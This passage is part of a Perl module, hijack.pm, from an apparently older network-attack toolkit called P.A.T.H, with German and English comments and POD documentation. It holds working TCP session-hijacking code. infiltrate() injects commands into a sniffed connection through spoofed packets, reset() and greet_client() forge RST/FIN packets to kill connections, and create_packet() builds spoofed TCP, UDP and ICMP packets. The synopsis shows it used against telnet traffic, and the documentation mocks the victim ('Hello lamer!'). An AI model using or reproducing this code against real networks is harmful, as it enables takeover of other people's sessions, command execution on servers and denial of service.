hijack.pm

一个rst守护程序

	# Wenn sie gefunden wurde, loesche sie...
	for($i=0; $i < scalar(@{$obj->{hijacked}}); $i++)
	{
	    if( ($obj->{hijacked}->[$i] eq "$src $dst") || ($obj->{hijacked}->[$i] eq "$dst $src") )
	    {
		splice(@{$obj->{hijacked}},$i,$i+1);
		last;
	    }
	}
    }

    # Loesche alle Eintraege
    else
    {
	@{$obj->{hijacked}} = ();
    }

    return $obj;
}


# Methode hijacked ueberprueft, ob die Verbindung schon
# gehijackt wurde
# Parameter: Pcap packet object
sub hijacked
{
    my $obj = shift;
    my $packet = shift;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});


    for(@{$obj->{hijacked}})
    {
	if( ($ip->{src_ip} . " " . $ip->{dst_ip} eq $_) ||  ($ip->{dst_ip} . " " . $ip->{src_ip} eq $_) )
	{
	    return 1;
	}
    }

    return 0;
}




###[ HIJACKING METHODS ]###


# Method infiltrate() infiltrates a command on server side
# Parameter: Command to infiltrate
sub infiltrate
{
    my($obj,$command) = @_;
    my $packet = new Net::RawIP;

    # Are we running in stateful mode?
    # Then inject the packet spoofed from the client to the server
    if($obj->{stateful})
    {
	$packet->set({
	    ip => {
		saddr => $obj->{client_ip},
		daddr => $obj->{server_ip}
	    },
	    tcp => {
		source => $obj->{client_port},
		dest => $obj->{server_port},
		psh => 1,
		ack => 1,
		seq => $obj->{server_ack},
		ack_seq => $obj->{client_ack},
		window => "2323",
		data => "$command\n"
		}
	});
	
	print "Hijacked " . $obj->{client_ip} . ":" . $obj->{client_port} . " --> " . $obj->{server_ip} . ":" . $obj->{server_port} . "  SEQ: " . $obj->{server_ack} . " Command: $command\n";
    }
    # We are running in stateless mode
    else
    {
	$packet->set({
	    ip => {
		saddr => $obj->{src_ip},
		daddr => $obj->{dest_ip}
	    },
	    tcp => {
		source => $obj->{src_port},
		dest => $obj->{dest_port},
		psh => 1,
		ack => 1,
		seq => $obj->{seqnum},
		ack_seq => $obj->{acknum},
		window => "2323",
		data => "$command\n"
		}
	});

	print "Hijacked " . $obj->{src_ip} . ":" . $obj->{src_port} . " --> " . $obj->{dest_ip} . ":" . $obj->{dest_port} . "  SEQ: " . $obj->{seqnum} . " Command: $command\n";
    }

    $packet->send(0,1);
}



# Methode greet_client() schickt eine Nachricht an den
# Client und resettet die Verbindung
# Diese Methode macht nur im stateful Modus Sinn
# Parameter: String fuer den armen Client
sub greet_client
{
    my($obj,$command) = @_;
    my $packet = new Net::RawIP;

    # Are we running in stateful mode?
    unless($obj->{stateful}) { print "You are not running in stateful mode!\n"; return; }

    # Create the packet...
    $packet->set({
	ip => {
	    saddr => $obj->{server_ip},
	    daddr => $obj->{client_ip}
	},
	tcp => {
	    source => $obj->{server_port},
	    dest => $obj->{client_port},
	    rst => 1,
	    seq => $obj->{client_ack},
	    ack_seq => $obj->{server_ack},
	    window => "2323",
	    data => $command
	    }
    });

    # ...and send it over the wire
    $packet->send(0,1);
}



# Create and send a Reset packet
# The first parameter to pass is a reset flag (RST|FIN)
# the second one is only necessary in stateful mode and
# tells the target direction (client|server)
sub reset
{
    my $obj = shift;
    my $flag = shift;
    my $target = shift;
    my $packet = new Net::RawIP;
    my($src_ip,$dest_ip,$src_port,$dest_port,$seqnum);

    $flag = lc($flag);

    unless($obj->is_hijackable) { return; }

# Are we running in stateful mode?
    if($obj->{stateful})
    {
	print "We are running in stateful mode!\n";

	# Which direction should be resettet?
	if($target eq "server")
	{
	    $src_ip = $obj->{client_ip};
	    $dest_ip = $obj->{server_ip};
	    $src_port = $obj->{client_port};
	    $dest_port = $obj->{server_port};
	    $seqnum = $obj->{server_ack};
	}
	else
	{
	    $src_ip = $obj->{server_ip};
	    $dest_ip = $obj->{client_ip};
	    $src_port = $obj->{server_port};
	    $dest_port = $obj->{client_port};
	    $seqnum = $obj->{client_ack};
	}
    }
    
    # We are running in stateless mode
    else
    {
	$src_ip = $obj->{dest_ip};
	$dest_ip = $obj->{src_ip};
	$src_port = $obj->{dest_port};
	$dest_port = $obj->{src_port};
	$seqnum = $obj->{acknum};
    }


# Reset via FIN packet
    if($flag eq "fin")
    {
# Create the packet
	$packet->set({
	    ip => {
		saddr => $src_ip,
		daddr => $dest_ip
		},
		    tcp => {
			source => $src_port,
			dest => $dest_port,
			fin => "1",
			seq => $seqnum,
		    }
	});

}

# Reset via RST packet
    else
    {
# Create the packet
	$packet->set({
	    ip => {
		saddr => $src_ip,
		daddr => $dest_ip
	    },
	    tcp => {
		source => $src_port,
		dest => $dest_port,
		rst => 1,
		seq => $seqnum
	    }
	});
}

# ...and throw it on the wire!
  $packet->send(0, 1);

    print "Send $flag packet. $src_ip:$src_port --> $dest_ip,$dest_port SEQ: $seqnum\n";
}





###[ Special functions ]###

# Create a packet (Net::RawIP object) 
# from a config object
sub create_packet
{
    my $cfg_obj = shift;
    my (%config, $protocol);

    # Do we allready have a reference to an option hash?
    if(ref($cfg_obj) eq HASH)
    {
	%config = %{$cfg_obj};
	$protocol = $config{'protocol'};
    }
    else
    {
	%config = $cfg_obj->get_opt();
	$protocol = $cfg_obj->get_protocol();
    }

# Create a TCP / IP packet
if($protocol eq "tcp")
{
    $packet = new Net::RawIP;
    $packet->set({
	ip => {
	    saddr => $config{'spoof'},
	    daddr => $config{'target'},
	    frag_off => $config{'frag'},
	    ttl => $config{'ttl'}
	} ,
	
	tcp => {
	    source => $config{'src_port'}, 
	    dest => $config{'dst_port'},
	    syn => $config{'syn'}, 
	    ack => $config{'ack'}, 
	    fin => $config{'fin'}, 
	    rst => $config{'rst'}, 
	    psh => $config{'psh'}, 
	    urg => $config{'urg'},
	    seq => $config{'seq'},
	    ack_seq => $config{'ack_seq'},
	    window => $config{'win'},
	    data => "$config{'data'}\r\n"
	    }
    });
}

# Create a UDP / IP packet
elsif($protocol eq "udp")
{
    $packet = new Net::RawIP({udp =>{}});
    $packet->set({
	ip => {
	    saddr => $config{'spoof'},
	    daddr => $config{'target'}
	} ,
	udp => {
	    source => $config{'src_port'}, 
	    dest => $config{'dst_port'},
	    data => "$config{'data'}\r\n"
	    }
    });
}

# Create a ICMP / IP packet
elsif($protocol eq "icmp")
{
    $packet = new Net::RawIP({icmp => {}});
    $packet->set({ 
	ip  => { ttl      => 64,
		 protocol => 1,
		 tos      => 0,
		 saddr    => $config{'spoof'},
		 daddr    => $config{'target'},
	     },
	icmp=> { type    => $config{'icmp-type'},
		 code    => $config{'icmp-code'},
		 data    => "$config{'data'}\r\n",
		 gateway => $config{'gateway'},
		 mtu => $config{'mtu'}
	     }
    });
}
# Create IP only packet
else
{
    $packet = new Net::RawIP;
    $packet->set({
	ip => {
	    saddr => $config{'spoof'},
	    daddr => $config{'target'},
	    frag_off => $config{'frag'},
	    ttl => $config{'ttl'}
	} 
    });
}

return $packet;
}




###[ Thats the end folks =) ]###

1;


__END__

###[ POD documentation ]###

=pod
=head2 NAME

   hijack.pm  --  P.A.T.H hijacking stuff

=head2 SYNOPSIS

   use hijack;
   use NET::PcapUtils;

   Net::PcapUtils::loop(\&sniffit,
                        PROMISC => 1,
		        FILTER => 'tcp and port 23',
		        DEV => 'eth0');

   sub sniffit
   {
       unless(defined $connection)
       {
	   $connection = hijack->new($packet);
       }  

      if($connection->is_established)
      {
         if( ($connection->check($packet)) && ($connection->check_port($packet,23,0)) )
         {
	    $connection->update($packet);
	    $connection->send_rst('rst');
         }
      }
   }


=head2 DESCRIPTION

   This module contains all the hijacking stuff of the P.A.T.H project.
   It supports stateful and stateless hijacking, connection resetting, 
   packet infiltration and more.
   Per default the module runs in stateless mode.
   If you want to run it in stateful mode use the stateful() method first.
   Please note that this module can only handle *one* connection in *one*
   object so if you want to handle more than one connection you have to
   store one hijack object per connection in an array or something like
    that. Maybe this will change in the future... Who knows? ;)


=head2 METHODS

   new
   check
   check_port
   check_ip
   check_flag
   stateful
   stateless
   set_server_seq
   server_seq
   set_client_seq
   client_seq
   is_established
   update
   update_seq   
   is_hijackable
   is_hijacked
   hijacked
   unset_hijacked
   infiltrate
   greet_client
   reset
   create_packet


=head2 DESCRIPTION OF METHODS

=item B<new()>

   $connection = hijack->new($packet);

   This method create a new stateless hijack object.
   It takes a Net::PcapUtils packet object as parameter.


=item B<check()>

   $connection->check($packet);

   This method simply check if the packet has got the same
   source or destination port / ip as the last saved one.
   If you are running in stateful method it will check if
   the specified packet either comes from the client and is
   send to the server or the other way round.
   The method returns true if the packet belongs to "our"
   connection otherwise it will return false.


=item B<check_port>

   $connection->check_port($packet,src,dest);

   Check_port() checks if the packet has got the specified src
   and destination port.
   You can choose a 0 or NULL if the number of one port is of 
   no interest for you.
   The method returns true if the specified ports are found in
   the packet otherwise it returns false.


=item B<check_ip>

   $connection->check_ip($packet,src,dest);

   The same as check_port(), but checks the ips...


=item B<check_flag>

    $connection.>check_flag($packet,$flag);

    Check if the given flag is set in the TCP header of 
    the passed packet. If the flag is set this method
    returns true otherwise it returns false.


=item B<stateful>

   $connection->stateful($packet,[server|client]);

    This method takes two options:
    A Net::PcapUtils packet object
    A direction: server or client
    Now the module can distinguish between a client
    and a server module. You can check the dicrection
    of the captured packet with the check_port() method.

=item B<stateless>

    $connection->stateless();

    This method tells the module that we dont want to run
    in stateful mode any more.

=item B<set_server_seq()>

   $connection->set_server_seq($packet);

    Save the sequence and acknowledgement number in the packet
    as server seq and ack.
    There is also a set_client_seq method.

=item B<server_seq()>

   $connection->server_seq()

    Returns true if the server sequence and acknowledgment number
    is known.
    There is also a client_seq method.
    This method does only make sense if you are running in stateful
    mode!


=item B<update()>

    $connection->update($packet);

    This method updates connection information in stateless 
    connection hijacking.
    Use update_seq if you only want to update the sequence and
    acknowledgement numbers.

=item B<is_hijackable()>

    $connection->is_hijackable();

    Returns true if you can sniff the sequence and acknowledgement numbers.


=item B<is_hijacked>

    $connection->is_hijacked();

    Remember that you have already hijacked the connection.
    Use the hijacked() method to check if a connection was marked
    as hijacked before.

=item B<unset_hijacked>

    $connection->unset_hijacked($src_ip,$dst_ip);

    Remove the specified source and destination ip from the
    hijacked array so we can hijack the connection again.
    If no parameter is specified all hijacked connection are
    deleted!


=item B<infiltrate()>

    $connection->infiltrate($command);

    This method will send a spoofed packet from the client to the
    server with the specified payload.
    In stateful mode this method injects the command to the server
    otherwise to the last specified destination ip and port.

=item B<greet_client()>

    $connection->greet_client("Hello lamer! Nice weather outside! =)");

    Use this method if you want to send a message to the client.
    This method can only be used in the stateful method.

=item B<reset()>

   $connection->reset($flag,$direction);

   The first parameter to pass is a reset flag (RST|FIN)
   the second one is only necessary in stateful mode and
   tells the target direction (client|server)

=item B<create_packet()>

    $packet = $connection->create_packet($cfg);

    This methods takes a config object to create and return a
    Net::RawIP packet object.
    See config module documentation for more information.


=head2 BUGS

    Debug the following methods:
    logged_in


=head2 AUTHOR

    Bastian Ballmann [ bytebeater@crazydj.de ]
    http://www.crazydj.de


=head2 COPYRIGHT

    This module is free software.
    Its licensed under the GPL.